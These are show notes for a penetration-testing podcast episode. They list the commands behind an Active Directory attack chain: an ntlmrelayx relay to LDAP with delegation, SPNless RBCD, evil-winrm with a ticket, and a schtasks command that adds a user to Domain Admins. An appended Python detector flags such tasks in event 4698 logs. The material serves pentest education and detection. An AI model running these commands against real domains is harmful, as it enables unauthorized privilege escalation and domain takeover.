
7MS #691: Tales of Pentest Pwnage – Part 75
7 Minute Security · Brian Johnson
September 5, 2025 · 31m 39s
Show Notes
Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? Yes. Do I mean it? Yes. Here are all the commands/links to supplement today's episode:
- Got an SA account to a SQL server through Snaffler-ing
- With that SA account, I learned how to coerce Web auth from within a SQL shell – read more about that here
- I relayed that Web auth with ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv
- I didn't have a machine account under my control, so I did SPNless RBCD on my lowpriv account – read more about that here
- Using that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket
- From there I checked out who had interactive logons: Get-Process -IncludeUserName explorer | Select-Object UserName
- Then I queued up a fake task to elevate me to DA: schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
- …and ran it: schtasks /run /tn "TotallyFineTask"
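For the blue-team side of that last step: an added example (not from the episode or from 7MS) that scans Security event 4698 "scheduled task created" records and flags tasks that will run as someone other than the account that created them, borrow another user's interactive token, or add a member to a privileged group. The events are constructed and reduced to the few fields the check needs (SubjectUserName, TaskName, TaskContent); real EVTX/XML parsing would sit in front of this.

```python
"""Flag suspicious scheduled-task creations (Security event 4698).
Sample records are constructed for this example, not real logs."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
PRIV_GROUPS = ("domain admins", "enterprise admins", "administrators")

# Constructed 4698 records: who created the task and the task's own XML.
EVENTS = [
    {"EventID": 4698, "SubjectUserName": "lowpriv", "TaskName": "\\TotallyFineTask",
     "TaskContent": """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
       <Principals><Principal><UserId>DOMAIN\\a-domain-admin</UserId>
       <LogonType>InteractiveToken</LogonType></Principal></Principals>
       <Actions><Exec><Command>net</Command>
       <Arguments>group "Domain Admins" lowpriv /add /domain</Arguments></Exec></Actions></Task>"""},
    {"EventID": 4698, "SubjectUserName": "svc_backup", "TaskName": "\\NightlyBackup",
     "TaskContent": """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
       <Principals><Principal><UserId>DOMAIN\\svc_backup</UserId>
       <LogonType>Password</LogonType></Principal></Principals>
       <Actions><Exec><Command>C:\\backup\\run.cmd</Command></Exec></Actions></Task>"""},
]

def task_summary(task_xml):
    """Pull run-as principal, logon type and the Exec action out of the task XML."""
    root = ET.fromstring(task_xml)
    find = lambda p: (root.findtext(p, default="", namespaces=NS) or "").strip()
    return {"run_as": find("t:Principals/t:Principal/t:UserId"),
            "logon_type": find("t:Principals/t:Principal/t:LogonType"),
            "command": find("t:Actions/t:Exec/t:Command"),
            "args": find("t:Actions/t:Exec/t:Arguments")}

def suspicious(event):
    """Return the list of reasons a 4698 event looks like abuse (empty if benign)."""
    if event.get("EventID") != 4698:
        return []
    s = task_summary(event["TaskContent"])
    creator = event["SubjectUserName"].lower()
    run_as = s["run_as"].split("\\")[-1].lower()   # drop DOMAIN\ prefix
    reasons = []
    if run_as and run_as != creator:
        reasons.append(f"created by {creator} but runs as {s['run_as']}")
    if s["logon_type"] == "InteractiveToken" and run_as != creator:
        reasons.append("runs in another user's interactive session (/it)")
    cmdline = f"{s['command']} {s['args']}".lower()
    if re.search(r"\bnet1?\s+group\b.*\s/add\b", cmdline) and any(g in cmdline for g in PRIV_GROUPS):
        reasons.append("action adds a member to a privileged group")
    return reasons

def scan(events):
    """Map TaskName -> reasons for every event that trips at least one check."""
    return {e["TaskName"]: suspicious(e) for e in events if suspicious(e)}

if __name__ == "__main__":
    for name, why in scan(EVENTS).items():
        print(name, "->", "; ".join(why))
```

Each check alone is noisy (admins legitimately schedule tasks as service accounts); the value is in the combination, and in correlating the creator with the 4624 logon that put a privileged user's session on the same host.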